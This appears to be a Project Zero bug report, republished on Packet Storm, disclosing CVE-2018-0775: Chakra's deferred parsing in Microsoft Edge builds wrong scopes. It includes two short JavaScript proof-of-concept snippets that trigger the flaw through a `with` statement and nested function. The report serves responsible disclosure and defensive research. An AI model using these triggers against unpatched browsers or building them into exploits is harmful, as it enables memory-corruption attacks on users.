Microsoft Egde Chakra deferred parsing makes wrong scopes.
4cb0d080415b639ddd74d96d80870142fd089f172bcbeab6ff378835a5252ed9Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2
CVE-2018-0775
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to <a href="/p/project-zero/issues/detail?id=1310" title="Microsoft Edge: Chakra: Deferred parsing makes wrong scopes" class="closed_ref" rel="nofollow"> issue 1310 </a>.
PoC:
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '\n'.repeat(0x1000));
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed